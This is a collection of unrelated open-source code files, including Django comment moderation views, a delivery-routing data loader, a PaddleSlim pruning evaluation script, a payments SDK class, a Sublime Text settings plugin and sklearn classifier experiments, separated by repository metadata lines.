Templates: :template:`comments/flag.html`,
Context:
comment
the flagged `comments.comment` object
"""
comment = get_object_or_404(
get_model(), pk=comment_id,
site__pk=get_current_site(request).pk
)
# Flag on POST
if request.method == 'POST':
perform_flag(request, comment)
return next_redirect(request, next)
return render(request, 'comments/flag.html', {
'comment': comment, 'next': next
})
@csrf_protect
@login_required
@permission_required('commentary.can_moderate')
def delete(request, comment_id, next=None):
"""
Deletes a comment. Confirmation on GET, action on POST. Requires the "can
moderate comments" permission.
Templates: :template:`comments/delete.html`,
Context:
comment
the flagged `comments.comment` object
"""
comment = get_object_or_404(
get_model(), pk=comment_id,
site__pk=get_current_site(request).pk
)
# Delete on POST
if request.method == 'POST':
# Flag the comment as deleted instead of actually deleting it.
perform_delete(request, comment)
return next_redirect(request, next)
return render(request, 'comments/delete.html', {
'comment': comment, 'next': next
})
@csrf_protect
@login_required
@permission_required("commentary.can_moderate")
def approve(request, comment_id, next=None):
"""
Approve a comment (that is, mark it as public and non-removed). Confirmation
on GET, action on POST. Requires the "can moderate comments" permission.
Templates: :template:`comments/approve.html`,
Context:
comment
the `comments.comment` object for approval
"""
comment = get_object_or_404(
get_model(), pk=comment_id,
site__pk=get_current_site(request).pk
)
# Approve on POST
if request.method == 'POST':
# Flag the comment as approved.
perform_approve(request, comment)
return next_redirect(request, next)
return render(request, 'comments/approve.html', {
'comment': comment, 'next': next
})
# The following functions actually perform the various flag/approve/delete
# actions. They've been broken out into separate functions so that they
# may be called from admin actions; a usage sketch follows perform_approve below.
def perform_flag(request, comment):
"""
Actually perform the flagging of a comment from a request.
"""
flag, created = models.CommentFlag.objects.get_or_create(
comment=comment,
user=request.user,
flag=models.CommentFlag.SUGGEST_REMOVAL
)
signals.comment_was_flagged.send(
sender=comment.__class__,
comment=comment,
flag=flag,
created=created,
request=request,
)
def perform_delete(request, comment):
flag, created = models.CommentFlag.objects.get_or_create(
comment=comment,
user=request.user,
flag=models.CommentFlag.MODERATOR_DELETION
)
comment.is_removed = True
comment.save()
signals.comment_was_flagged.send(
sender=comment.__class__,
comment=comment,
flag=flag,
created=created,
request=request,
)
def perform_approve(request, comment):
flag, created = models.CommentFlag.objects.get_or_create(
comment=comment,
user=request.user,
flag=models.CommentFlag.MODERATOR_APPROVAL,
)
comment.is_removed = False
comment.is_public = True
comment.save()
signals.comment_was_flagged.send(
sender=comment.__class__,
comment=comment,
flag=flag,
created=created,
request=request,
)
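# --- Sketch (not in the original module; hedged): wiring perform_approve into
# a Django admin action, as the comment above suggests. The action function
# name and its registration are illustrative assumptions.
#
#   def approve_comments(modeladmin, request, queryset):
#       for comment in queryset:
#           perform_approve(request, comment)
#   approve_comments.short_description = "Approve selected comments"
#
#   # e.g. actions = [approve_comments] on a ModelAdmin for the comment model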
| 2.125 | 2 |
wgups/data/data_loader.py | IMax153/wgups_C950 | 2 | 12761582 |
from __future__ import annotations
from datetime import timedelta
from json import load
from os import path
from typing import Any, Mapping
from wgups.structures.clock import Clock
from wgups.structures.hash_set import HashSet
from wgups.routing.package import Package
Distances = HashSet[str, HashSet[str, str]]
Packages = HashSet[int, Package]
Prompts = HashSet[str, str]
class DataLoader:
"""A class for loading external data into the application. Utilizes a cache to ensure
    that data is only ever loaded once.
Class Attributes
----------------
cache : HashSet[str, Any]
The cache which handles storing file data.
"""
cache = HashSet[str, Any]()
@classmethod
def load_json(cls, filename) -> Mapping[Any, Any]:
"""Attempts to retrieve the file from the cache. Loads the file data if it is not
present in the cache.
Returns
-------
Mapping[Any, Any]
The JSON file data.
Space Complexity
---------------
O(n)
Time Complexity
---------------
O(n)
"""
file_path = path.join(path.dirname(__file__), filename)
with open(file_path, 'r') as file:
return load(file)
@classmethod
def get_packages(cls) -> Packages:
"""Attempts to retrieve the packages from the cache. Loads the package data from a file
if it is not present in the cache.
Returns
-------
HashSet[int, str]
The mapping of package identifiers to package objects.
Space Complexity
---------------
O(n)
Time Complexity
---------------
O(n)
"""
if 'packages' not in cls.cache:
cls.cache.set('packages', cls.load_packages())
return cls.cache.get('packages')
@classmethod
def load_packages(cls) -> Packages:
"""Loads the package data from a file.
Returns
-------
HashSet[int, str]
The mapping of package identifiers to package objects.
Space Complexity
---------------
O(n)
Time Complexity
---------------
O(n)
"""
data = cls.load_json('data/package_data.json')
size = len(data)
packages = HashSet(size)
for key, value in data.items():
identifier = int(key)
(hours, minutes) = map(int, value['deadline'].split(':'))
deadline = Clock(hours, minutes)
package = Package(
identifier,
value['address'],
value['city'],
value['state'],
value['zip'],
value['kg'],
deadline,
)
# Delayed packages - will not arrive at depot until 09:05
if package.id in [6, 25, 28, 32]:
package.arrival_time = Clock(9, 5)
# Incorrect address - will be corrected at 10:20
if package.id == 9:
package.street = '410 S State St'
package.arrival_time = Clock(10, 20)
# Package must be delivered via truck two
if package.id in [3, 18, 36, 38]:
package.deliverable_by = [2]
package.is_priority = True
# Package must be delivered with linked packages
if package.id in [13, 14, 15, 16, 19, 20]:
package.linked = True
package.is_priority = True
packages.set(identifier, package)
return packages
@classmethod
def get_distances(cls) -> Distances:
"""Attempts to retrieve the distances from the cache. Loads the distance data from a file
if it is not present in the cache.
Returns
-------
HashSet[str, HashSet[str, str]]
The mapping of from and to addresses and the corresponding distance between them.
Space Complexity
---------------
O(n)
Time Complexity
---------------
O(n)
"""
if 'distances' not in cls.cache:
cls.cache.set('distances', cls.load_distances())
return cls.cache.get('distances')
@classmethod
def load_distances(cls) -> Distances:
"""Loads the distance data from a file.
Returns
-------
HashSet[str, HashSet[str, str]]
The mapping of from and to addresses and the corresponding distance between them.
Space Complexity
---------------
O(n)
Time Complexity
---------------
O(n)
"""
data = cls.load_json('data/distance_data.json')
size = len(data)
distances = HashSet(size)
for from_address, destinations in data.items():
if from_address not in distances:
distances.set(from_address, HashSet(size))
for to_address, miles in destinations.items():
distances.get(from_address).set(to_address, miles)
return distances
@classmethod
def get_prompts(cls) -> Prompts:
"""Attempts to retrieve the prompts from the cache. Loads the prompt data from a file
if it is not present in the cache.
Returns
-------
HashSet[str, str]
The mapping of prompt names to prompt values.
Space Complexity
---------------
O(n)
Time Complexity
---------------
O(n)
"""
if 'prompts' not in cls.cache:
cls.cache.set('prompts', cls.load_prompts())
return cls.cache.get('prompts')
@classmethod
def load_prompts(cls) -> Prompts:
"""Loads the prompt data from a file.
Returns
-------
HashSet[str, str]
The mapping of prompt names to prompt values.
Space Complexity
---------------
O(n)
Time Complexity
---------------
O(n)
"""
data = cls.load_json('data/prompts.json')
size = len(data)
prompts = HashSet(size)
for key, value in data.items():
prompts.set(key, value)
return prompts
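# --- Hedged usage sketch (illustrative; address keys follow the JSON data) ---
#   packages = DataLoader.get_packages()    # parsed once, then served from cache
#   pkg = packages.get(1)                   # look up package id 1
#   distances = DataLoader.get_distances()
#   miles = distances.get(from_address).get(to_address)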
| 2.46875 | 2 |
RUNFILE.py | AbhilashPal/IETHackathon18 | 0 | 12761583 |
import py1
py1.func1()
| 1.007813 | 1 |
scripts/parse_state_file.py | COMSYS/coinprune | 3 | 12761584 | #!/usr/bin/env python3
import argparse
import binascii
import struct
def get_state_height(file_handler):
res = file_handler.read(4)
res = struct.unpack('I', res)[0]
return res
def get_block_hash(file_handler):
res = file_handler.read(32)[::-1]
res = binascii.hexlify(res).decode('utf-8')
return res
def get_num_chunks(file_handler):
res = file_handler.read(4)
res = struct.unpack('I', res)[0]
return res
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument('filename', type=str, help='Name of the state file to load')
args = argparser.parse_args()
with open(args.filename, 'rb') as f:
state_height = get_state_height(f)
state_latest_block_hash = get_block_hash(f)
state_num_chunks = get_num_chunks(f)
print('State file name: {}'.format(args.filename))
print('')
print('State block height: {}'.format(state_height))
print('Latest block hash: {}'.format(state_latest_block_hash))
print('Number chunks: {}'.format(state_num_chunks))
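    # --- Hedged round-trip sketch (not part of the original script) ---
    # The header parsed above is: uint32 height, 32-byte little-endian block
    # hash, uint32 chunk count. A matching test file could be generated like
    # this ('state_test.bin' is an illustrative name):
    #   with open('state_test.bin', 'wb') as out:
    #       out.write(struct.pack('I', 700000))  # state height
    #       out.write(bytes(32))                 # zeroed block hash
    #       out.write(struct.pack('I', 42))      # number of chunks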
| 3.0625 | 3 |
DateTime/TimeExample1.py | suprit08/PythonAssignments | 0 | 12761585 | #TimeExample1.py
import time
# Print the number of "ticks" (seconds) elapsed since 00:00, 1st January 1970
print("No. of ticks since the 1970 epoch:", time.time()) | 2.71875 | 3 |
demo/unstructured_prune/evaluate.py | zzjjay/PaddleSlim | 0 | 12761586 |
import os
import sys
import logging
import paddle
import argparse
import functools
import math
import time
import numpy as np
import paddle.fluid as fluid
sys.path.append(os.path.join(os.path.dirname("__file__"), os.path.pardir))
from paddleslim.prune.unstructured_pruner import UnstructuredPruner
from paddleslim.common import get_logger
import models
from utility import add_arguments, print_arguments
import paddle.vision.transforms as T
_logger = get_logger(__name__, level=logging.INFO)
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
# yapf: disable
add_arg('batch_size', int, 64, "Minibatch size.")
add_arg('use_gpu', bool, True, "Whether to use GPU or not.")
add_arg('model', str, "MobileNet", "The target model.")
add_arg('pruned_model', str, "models", "Directory to load the pruned model from.")
add_arg('data', str, "mnist", "Which data to use. 'mnist' or 'imagenet'.")
add_arg('log_period', int, 100, "Log period in batches.")
# yapf: enable
model_list = models.__all__
def compress(args):
train_reader = None
test_reader = None
if args.data == "mnist":
transform = T.Compose([T.Transpose(), T.Normalize([127.5], [127.5])])
train_dataset = paddle.vision.datasets.MNIST(
mode='train', backend="cv2", transform=transform)
val_dataset = paddle.vision.datasets.MNIST(
mode='test', backend="cv2", transform=transform)
class_dim = 10
image_shape = "1,28,28"
elif args.data == "imagenet":
import imagenet_reader as reader
train_dataset = reader.ImageNetDataset(mode='train')
val_dataset = reader.ImageNetDataset(mode='val')
class_dim = 1000
image_shape = "3,224,224"
else:
raise ValueError("{} is not supported.".format(args.data))
image_shape = [int(m) for m in image_shape.split(",")]
assert args.model in model_list, "{} is not in lists: {}".format(args.model,
model_list)
places = paddle.static.cuda_places(
) if args.use_gpu else paddle.static.cpu_places()
place = places[0]
exe = paddle.static.Executor(place)
image = paddle.static.data(
name='image', shape=[None] + image_shape, dtype='float32')
label = paddle.static.data(name='label', shape=[None, 1], dtype='int64')
batch_size_per_card = int(args.batch_size / len(places))
valid_loader = paddle.io.DataLoader(
val_dataset,
places=place,
feed_list=[image, label],
drop_last=False,
return_list=False,
use_shared_memory=True,
batch_size=batch_size_per_card,
shuffle=False)
# model definition
model = models.__dict__[args.model]()
out = model.net(input=image, class_dim=class_dim)
cost = paddle.nn.functional.loss.cross_entropy(input=out, label=label)
avg_cost = paddle.mean(x=cost)
acc_top1 = paddle.metric.accuracy(input=out, label=label, k=1)
acc_top5 = paddle.metric.accuracy(input=out, label=label, k=5)
val_program = paddle.static.default_main_program().clone(for_test=True)
exe.run(paddle.static.default_startup_program())
if args.pruned_model:
def if_exist(var):
return os.path.exists(os.path.join(args.pruned_model, var.name))
_logger.info("Load pruned model from {}".format(args.pruned_model))
paddle.fluid.io.load_vars(exe, args.pruned_model, predicate=if_exist)
def test(epoch, program):
acc_top1_ns = []
acc_top5_ns = []
_logger.info("The current density of the inference model is {}%".format(
round(100 * UnstructuredPruner.total_sparse(
paddle.static.default_main_program()), 2)))
for batch_id, data in enumerate(valid_loader):
start_time = time.time()
acc_top1_n, acc_top5_n = exe.run(
program, feed=data, fetch_list=[acc_top1.name, acc_top5.name])
end_time = time.time()
if batch_id % args.log_period == 0:
_logger.info(
"Eval epoch[{}] batch[{}] - acc_top1: {}; acc_top5: {}; time: {}".
format(epoch, batch_id,
np.mean(acc_top1_n),
np.mean(acc_top5_n), end_time - start_time))
acc_top1_ns.append(np.mean(acc_top1_n))
acc_top5_ns.append(np.mean(acc_top5_n))
_logger.info("Final eval epoch[{}] - acc_top1: {}; acc_top5: {}".format(
epoch,
np.mean(np.array(acc_top1_ns)), np.mean(np.array(acc_top5_ns))))
test(0, val_program)
def main():
paddle.enable_static()
args = parser.parse_args()
print_arguments(args)
compress(args)
if __name__ == '__main__':
main()
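# Example invocation (hedged; paths and flag values are illustrative):
#   python evaluate.py --data mnist --model MobileNet \
#       --pruned_model models --batch_size 64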
| 2.28125 | 2 |
February/Day25-Compare Version Numbers.py | tayyrov/Daily_Coding_Challenge | 1 | 12761587 | """
Question Source: Leetcode
Level: Medium
Topic: String
Solver: Tayyrov
Date: 25.02.2022
"""
def compareVersion(version1: str, version2: str) -> int:
v1 = list(map(int, version1.split(".")))
v2 = list(map(int, version2.split(".")))
dif = abs(len(v1) - len(v2))
extra = [0] * dif
if len(v1) < len(v2):
v1 += extra
else:
v2 += extra
for n1, n2 in zip(v1, v2):
if n1 > n2:
return 1
elif n2 > n1:
return -1
return 0
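# Quick self-test (added; not part of the original snippet):
if __name__ == "__main__":
    assert compareVersion("1.01", "1.001") == 0  # revisions compare as ints
    assert compareVersion("1.0", "1.0.0") == 0   # missing revisions count as 0
    assert compareVersion("0.1", "1.1") == -1
    print("all checks passed")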
| 3.296875 | 3 |
library_display.py | hmaerki/openscad_switchbox | 0 | 12761588 |
from dataclasses import dataclass
from solid import *
from solid.utils import *
@dataclass
class CoreDisplayUsb:
# Space required by Micro USB connector
usb_width = 14
usb_thickness = 10
usb_r = 3
usb_dummy_length = 20
def draw(self):
return rotate([0, 90, 0])(
linear_extrude(height=self.usb_dummy_length)(
offset(r=self.usb_r)(
square(
[
self.usb_width - 2 * self.usb_r,
self.usb_thickness - 2 * self.usb_r,
],
center=True,
)
)
)
)
@dataclass
class CoreDisplay:
glass_thickness = 3
glass_width = 48
glass_height = 20
glass_r = 3
is_top: bool
def draw(self):
display = union()
# Display glass
display += translate(v=[0, self.glass_thickness, 0])(
rotate([90, 0, 0])(
linear_extrude(height=self.glass_thickness)(
offset(r=self.glass_r)(
square(
[
self.glass_width - 2 * self.glass_r,
self.glass_height - 2 * self.glass_r,
],
center=True,
)
)
)
)
)
# PCB
pcb_thickness = 2
pcb_width = 53
pcb_height = 25
display += translate([-pcb_width / 2, self.glass_thickness, -pcb_height / 2])(
cube([pcb_width, pcb_thickness, pcb_height])
)
# Raspberry Pi Board
pi_thickness = 14.3
pi_width = 52
pi_height = 21
display += translate(
[-pi_width / 2, self.glass_thickness + pcb_thickness, -pi_height / 2]
)(cube([pi_width, pi_thickness, pi_height]))
# USB
usb_center_y = 18
display += translate([pi_width / 2, usb_center_y, 0])(CoreDisplayUsb().draw())
if not self.is_top:
# Reset Button
for x in (13, -9):
for z in (-3, -2, -1, 0, 1, 2):
display += translate(v=[x, 25, z])(debug(rotate([90, 0, 0])(cylinder(d=5, h=10))))
return display
SEGMENTS = 100
core_display = CoreDisplay(is_top=False)
scad_render_to_file(
core_display.draw(), file_header=f"$fn = {SEGMENTS};", include_orig_code=True
)
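# Hedged note: with no explicit filepath, scad_render_to_file() is expected to
# write a .scad file named after this script (pass filepath=... to choose the
# name); the result opens in OpenSCAD, where $fn = 100 smooths the cylinders.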
| 2.875 | 3 |
onlinepayments/sdk/domain/mobile_payment_method_specific_input.py | wl-online-payments-direct/sdk-python2 | 0 | 12761589 |
# -*- coding: utf-8 -*-
#
# This class was auto-generated.
#
from onlinepayments.sdk.data_object import DataObject
from onlinepayments.sdk.domain.decrypted_payment_data import DecryptedPaymentData
from onlinepayments.sdk.domain.mobile_payment_product320_specific_input import MobilePaymentProduct320SpecificInput
class MobilePaymentMethodSpecificInput(DataObject):
"""
| Object containing the specific input details for mobile payments
"""
__authorization_mode = None
__decrypted_payment_data = None
__encrypted_payment_data = None
__ephemeral_key = None
__payment_product320_specific_input = None
__payment_product_id = None
__public_key_hash = None
__requires_approval = None
@property
def authorization_mode(self):
"""
| Determines the type of the authorization that will be used. Allowed values:
| * FINAL_AUTHORIZATION - The payment creation results in an authorization that is ready for capture. Final authorizations can't be reversed and need to be captured for the full amount within 7 days.
| * PRE_AUTHORIZATION - The payment creation results in a pre-authorization that is ready for capture. Pre-authortizations can be reversed and can be captured within 30 days. The capture amount can be lower than the authorized amount.
| * SALE - The payment creation results in an authorization that is already captured at the moment of approval.
| Only used with some acquirers, ignored for acquirers that don't support this. In case the acquirer doesn't allow this to be specified the authorizationMode is 'unspecified', which behaves similar to a final authorization.
Type: str
"""
return self.__authorization_mode
@authorization_mode.setter
def authorization_mode(self, value):
self.__authorization_mode = value
@property
def decrypted_payment_data(self):
"""
| The payment data if you do the decryption of the encrypted payment data yourself.
Type: :class:`onlinepayments.sdk.domain.decrypted_payment_data.DecryptedPaymentData`
"""
return self.__decrypted_payment_data
@decrypted_payment_data.setter
def decrypted_payment_data(self, value):
self.__decrypted_payment_data = value
@property
def encrypted_payment_data(self):
"""
| The payment data if we will do the decryption of the encrypted payment data. Typically you'd use encryptedCustomerInput in the root of the create payment request to provide the encrypted payment data instead.
| * For Apple Pay, the encrypted payment data can be found in property data of the PKPayment.token.paymentData property.
Type: str
"""
return self.__encrypted_payment_data
@encrypted_payment_data.setter
def encrypted_payment_data(self, value):
self.__encrypted_payment_data = value
@property
def ephemeral_key(self):
"""
| Ephemeral Key
| A unique generated key used by Apple to encrypt data.
Type: str
"""
return self.__ephemeral_key
@ephemeral_key.setter
def ephemeral_key(self, value):
self.__ephemeral_key = value
@property
def payment_product320_specific_input(self):
"""
| Object containing information specific to Google Pay. Required for payments with product 320.
Type: :class:`onlinepayments.sdk.domain.mobile_payment_product320_specific_input.MobilePaymentProduct320SpecificInput`
"""
return self.__payment_product320_specific_input
@payment_product320_specific_input.setter
def payment_product320_specific_input(self, value):
self.__payment_product320_specific_input = value
@property
def payment_product_id(self):
"""
| Payment product identifier - Please see Products documentation for a full overview of possible values.
Type: int
"""
return self.__payment_product_id
@payment_product_id.setter
def payment_product_id(self, value):
self.__payment_product_id = value
@property
def public_key_hash(self):
"""
| Public Key Hash
| A unique identifier to retrieve key used by Apple to encrypt information.
Type: str
"""
return self.__public_key_hash
@public_key_hash.setter
def public_key_hash(self, value):
self.__public_key_hash = value
@property
def requires_approval(self):
"""
| * true = the payment requires approval before the funds will be captured using the Approve payment or Capture payment API
| * false = the payment does not require approval, and the funds will be captured automatically
Type: bool
"""
return self.__requires_approval
@requires_approval.setter
def requires_approval(self, value):
self.__requires_approval = value
def to_dictionary(self):
dictionary = super(MobilePaymentMethodSpecificInput, self).to_dictionary()
if self.authorization_mode is not None:
dictionary['authorizationMode'] = self.authorization_mode
if self.decrypted_payment_data is not None:
dictionary['decryptedPaymentData'] = self.decrypted_payment_data.to_dictionary()
if self.encrypted_payment_data is not None:
dictionary['encryptedPaymentData'] = self.encrypted_payment_data
if self.ephemeral_key is not None:
dictionary['ephemeralKey'] = self.ephemeral_key
if self.payment_product320_specific_input is not None:
dictionary['paymentProduct320SpecificInput'] = self.payment_product320_specific_input.to_dictionary()
if self.payment_product_id is not None:
dictionary['paymentProductId'] = self.payment_product_id
if self.public_key_hash is not None:
dictionary['publicKeyHash'] = self.public_key_hash
if self.requires_approval is not None:
dictionary['requiresApproval'] = self.requires_approval
return dictionary
def from_dictionary(self, dictionary):
super(MobilePaymentMethodSpecificInput, self).from_dictionary(dictionary)
if 'authorizationMode' in dictionary:
self.authorization_mode = dictionary['authorizationMode']
if 'decryptedPaymentData' in dictionary:
if not isinstance(dictionary['decryptedPaymentData'], dict):
raise TypeError('value \'{}\' is not a dictionary'.format(dictionary['decryptedPaymentData']))
value = DecryptedPaymentData()
self.decrypted_payment_data = value.from_dictionary(dictionary['decryptedPaymentData'])
if 'encryptedPaymentData' in dictionary:
self.encrypted_payment_data = dictionary['encryptedPaymentData']
if 'ephemeralKey' in dictionary:
self.ephemeral_key = dictionary['ephemeralKey']
if 'paymentProduct320SpecificInput' in dictionary:
if not isinstance(dictionary['paymentProduct320SpecificInput'], dict):
raise TypeError('value \'{}\' is not a dictionary'.format(dictionary['paymentProduct320SpecificInput']))
value = MobilePaymentProduct320SpecificInput()
self.payment_product320_specific_input = value.from_dictionary(dictionary['paymentProduct320SpecificInput'])
if 'paymentProductId' in dictionary:
self.payment_product_id = dictionary['paymentProductId']
if 'publicKeyHash' in dictionary:
self.public_key_hash = dictionary['publicKeyHash']
if 'requiresApproval' in dictionary:
self.requires_approval = dictionary['requiresApproval']
return self
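# --- Hedged usage sketch (field values are illustrative assumptions) ---
#   specific_input = MobilePaymentMethodSpecificInput()
#   specific_input.payment_product_id = 302      # illustrative product id
#   specific_input.authorization_mode = 'SALE'
#   payload = specific_input.to_dictionary()     # wire-format dict
#   clone = MobilePaymentMethodSpecificInput().from_dictionary(payload)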
| 2.15625 | 2 |
forum/middleware/request_utils.py | Stackato-Apps/osqa | 1 | 12761590 | import forum
from forum.settings import MAINTAINANCE_MODE, APP_LOGO, APP_TITLE
from forum.http_responses import HttpResponseServiceUnavailable
class RequestUtils(object):
def process_request(self, request):
if MAINTAINANCE_MODE.value is not None and isinstance(MAINTAINANCE_MODE.value.get('allow_ips', None), list):
ip = request.META['REMOTE_ADDR']
if not ip in MAINTAINANCE_MODE.value['allow_ips']:
return HttpResponseServiceUnavailable(MAINTAINANCE_MODE.value.get('message', ''))
if request.session.get('redirect_POST_data', None):
request.POST = request.session.pop('redirect_POST_data')
request.META['REQUEST_METHOD'] = "POST"
self.request = request
forum.REQUEST_HOLDER.request = request
return None
def process_response(self, request, response):
forum.REQUEST_HOLDER.request = None
return response
| 2.25 | 2 |
preserialize/deconstructor/builtins.py | jahs/preserialize | 2 | 12761591 |
import importlib
from .. import Deconstructor, STR
class TypeDeconstructor(Deconstructor):
name = u"type"
def deconstruct(self, obj):
return None, {u"name" : STR(obj.__name__),
u"module" : STR(obj.__module__)}
def construct(self, args, kwargs):
class_name, module_name = kwargs["name"], kwargs["module"]
        mod = importlib.import_module(module_name)  # also resolves dotted package paths
return getattr(mod, class_name)
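# Hedged round-trip sketch (Python 3, where dict.__module__ == 'builtins'):
#   d = TypeDeconstructor()
#   args, kwargs = d.deconstruct(dict)  # (None, {u'name': 'dict', u'module': 'builtins'})
#   assert d.construct(args, kwargs) is dict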
| 2.671875 | 3 |
Lib/site-packages/wx-2.8-msw-unicode/wx/tools/Editra/src/syntax/_actionscript.py | ekkipermana/robotframework-test | 27 | 12761592 |
###############################################################################
# Name: actionscript.py #
# Purpose: Define ActionScript syntax for highlighting and other features #
# Author: <NAME> <<EMAIL>> #
# Copyright: (c) 2008 <NAME> <<EMAIL>> #
# License: wxWindows License #
###############################################################################
"""
FILE: actionscript.py
AUTHOR: <NAME>
@summary: Lexer configuration file for ActionScript
"""
__author__ = "<NAME> <<EMAIL>>"
__svnid__ = "$Id: _actionscript.py 62364 2009-10-11 01:02:12Z CJP $"
__revision__ = "$Revision: 62364 $"
#-----------------------------------------------------------------------------#
# Imports
import wx.stc as stc
# Local Imports
import synglob
import syndata
import _cpp
#-----------------------------------------------------------------------------#
#---- Keyword Specifications ----#
# ActionScript Keywords 0
AS_KEYWORDS = ("break case catch continue default do each else finally for if "
"in label new return super switch throw while with "
# Attribute Keywords
"dynamic final internal native override private protected "
"public static "
# Definition Keywords
"class const extends function get implements interface "
"namespace package set var "
# Directives
"import include use "
# Primary Expression Keywords
"false null this true "
# Special Types
"void Null *")
# ActionScript Keywords 1
# Namespaces and Packages
AS_TYPES = ("AS3 flash_proxy object_proxy flash accessibility display errors "
"events external filters geom media net printing profiler system "
"text ui utils xml ")
#---- Syntax Style Specs ----#
# Same as cpp
#---- Extra Properties ----#
# Same as cpp
#------------------------------------------------------------------------------#
class SyntaxData(syndata.SyntaxDataBase):
"""ActionScript SyntaxData"""
def __init__(self, langid):
syndata.SyntaxDataBase.__init__(self, langid)
# Setup
self.SetLexer(stc.STC_LEX_CPP)
self.RegisterFeature(synglob.FEATURE_AUTOINDENT, _cpp.AutoIndenter)
def GetKeywords(self):
"""Returns Specified Keywords List
@param lang_id: used to select specific subset of keywords
"""
return [(0, AS_KEYWORDS), (1, AS_TYPES)]
def GetSyntaxSpec(self):
"""Syntax Specifications
@param lang_id: used for selecting a specific subset of syntax specs
"""
return _cpp.SYNTAX_ITEMS
def GetProperties(self):
"""Returns a list of Extra Properties to set
@param lang_id: used to select a specific set of properties
"""
return [_cpp.FOLD, _cpp.FOLD_PRE]
def GetCommentPattern(self):
"""Returns a list of characters used to comment a block of code
@param lang_id: used to select a specific subset of comment pattern(s)
"""
return [u'//']
| 1.875 | 2 |
Lab3/Code/main.py | keithnull/EE101 | 2 | 12761593 | # coding:utf-8
from load_data import load_data, timer
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.model_selection import StratifiedShuffleSplit
from sklearn.model_selection import GridSearchCV
import numpy as np
import pandas as pd
@timer
def use_logistic_regression(X_train, y_train, X_test, y_test):
model = LogisticRegression()
print("Start to train a logistic regression model.")
model.fit(X_train, y_train)
score = model.score(X_test, y_test)
print("Score of logistic regression:", score)
@timer
def use_naive_bayes(X_train, y_train, X_test, y_test):
model = GaussianNB()
print("Start to train a naive bayes model.")
model.fit(X_train, y_train)
score = model.score(X_test, y_test)
print("Score of naive bayes:", score)
@timer
def use_SVM(X_train, y_train, X_test, y_test, kernel="linear"):
try:
model = SVC(kernel=kernel, C=10.0, gamma=0.001)
print("Start to train a SVM model(kernel: {0}).".format(kernel))
model.fit(X_train, y_train)
score = model.score(X_test, y_test)
print("Score of SVM(kernel: {0}):".format(kernel), score)
    except Exception as e:  # avoid a bare except so real errors surface
        print("Error!", e)
def optimize_SVM(X_train, y_train, X_test, y_test):
C_range = np.logspace(-4, 3, 8)
gamma_range = np.logspace(-4, 3, 8)
kernel_range = ["linear", "rbf"]
param_grid = dict(gamma=gamma_range, C=C_range, kernel=kernel_range)
grid = GridSearchCV(SVC(),
param_grid=param_grid, n_jobs=-1,)
    grid.fit(X_train[:100], y_train[:100])  # small subset keeps the grid search fast
print("The best parameters are %s with a score of %0.2f"
% (grid.best_params_, grid.best_score_))
if __name__ == '__main__':
X_train, y_train, X_test, y_test = load_data()
#use_logistic_regression(X_train, y_train, X_test, y_test)
#use_naive_bayes(X_train, y_train, X_test, y_test)
SVM_kernels = ["linear", "rbf", "sigmoid"]
for kernel in SVM_kernels:
use_SVM(X_train, y_train, X_test, y_test, kernel)
#optimize_SVM(X_train, y_train, X_test, y_test)
'''Sample Output:
Start to load training data from file.
Runtime:54.356s
Start to load testing data from file.
Runtime:13.156s
Start to load training data from feature file.
Runtime:0.276s
Start to load testinging data from feature file.
Runtime:0.068s
Start to train a logistic regression model.
Score of logistic regression: 0.75
Runtime:0.026s
Start to train a naive bayes model.
Score of naive bayes: 0.720543806647
Runtime:0.016s
Start to train a SVM model(kernel: linear).
Score of SVM(kernel: linear): 0.730362537764
Runtime:6.807s
Start to train a SVM model(kernel: rbf).
Score of SVM(kernel: rbf): 0.690332326284
Runtime:2.324s
Start to train a SVM model(kernel: sigmoid).
Score of SVM(kernel: sigmoid): 0.615558912387
Runtime:1.207s
'''
# The best parameters are {'C': 1, 'gamma': 0.125, 'kernel': 'linear'} with a score of 0.78
| 2.78125 | 3 |
plugins/xml_hidden_extensions_hotfix.py | MattDMo/PackageDev | 288 | 12761594 |
"""Bootstrap the 'hidden_extensions' setting for the XML syntax.
The XML package includes a `XML.sublime-settings` file
that sets `hidden_extensions` to include some of the extensions
we want to highlight with our package.
There is currently no other way to override this,
so we manually override this extension list
in a User settings file with a plugin.
See also:
https://github.com/sublimehq/Packages/issues/823
https://github.com/SublimeTextIssues/Core/issues/1326
"""
import sublime
from sublime_lib import ResourcePath
__all__ = [
"plugin_loaded",
]
DEFAULT_VALUE = ["rss", "sublime-snippet", "vcproj", "tmLanguage", "tmTheme", "tmSnippet",
"tmPreferences", "dae"]
MODIFIED_VALUE = ["rss", "vcproj", "tmLanguage", "tmTheme", "tmSnippet", "dae"]
# Encode ST build and date of last change (of this file) into the bootstrap value.
# I'm not sure what exactly I'm gonna do with it, so just include info I might find useful later.
BOOTSTRAP_VALUE = [3126, 2017, 3, 13]
def override_extensions(expected, modified):
settings = sublime.load_settings("XML.sublime-settings")
if settings.get('hidden_extensions') == expected:
settings.set('hidden_extensions', modified)
settings.set('package_dev.bootstrapped', BOOTSTRAP_VALUE)
sublime.save_settings("XML.sublime-settings")
print("[PackageDev] Bootstrapped XML's `hidden_extensions` setting")
def remove_override():
settings = sublime.load_settings("XML.sublime-settings")
if settings.get('package_dev.bootstrapped'):
settings.erase('package_dev.bootstrapped')
if settings.get('hidden_extensions') == MODIFIED_VALUE:
settings.erase('hidden_extensions')
print("[PackageDev] Unbootstrapped XML's `hidden_extensions` setting")
sublime.save_settings("XML.sublime-settings")
sublime.set_timeout(remove_file_if_empty, 2000) # Give ST time to write the file
def remove_file_if_empty():
path = ResourcePath("Packages/User/XML.sublime-settings").file_path()
try:
with path.open() as f:
data = sublime.decode_value(f.read())
except (FileNotFoundError, ValueError):
pass
else:
if not data or len(data) == 1 and 'extensions' in data and not data['extensions']:
path.unlink()
print("[PackageDev] Removed now-empty XML.sublime-settings")
def plugin_loaded():
version = int(sublime.version())
if version < 3153:
override_extensions(DEFAULT_VALUE, MODIFIED_VALUE)
# "csproj" was added for 3153.
# https://github.com/sublimehq/Packages/commit/4a3712b7e236f8c4b443282d97bad17f68df318c
# Technically there was a change in 4050, but nobody should be using that anymore.
# https://github.com/sublimehq/Packages/commit/7866273af18398bce324408ff23c7a22f30486c8
elif version < 4075:
override_extensions(DEFAULT_VALUE + ["csproj"], MODIFIED_VALUE + ["csproj"])
elif version >= 4075:
# The settings were move to the syntax file
# https://github.com/sublimehq/Packages/commit/73b16ff196d3cbaf7df2cf5807fda6ab68a2434e
remove_override()
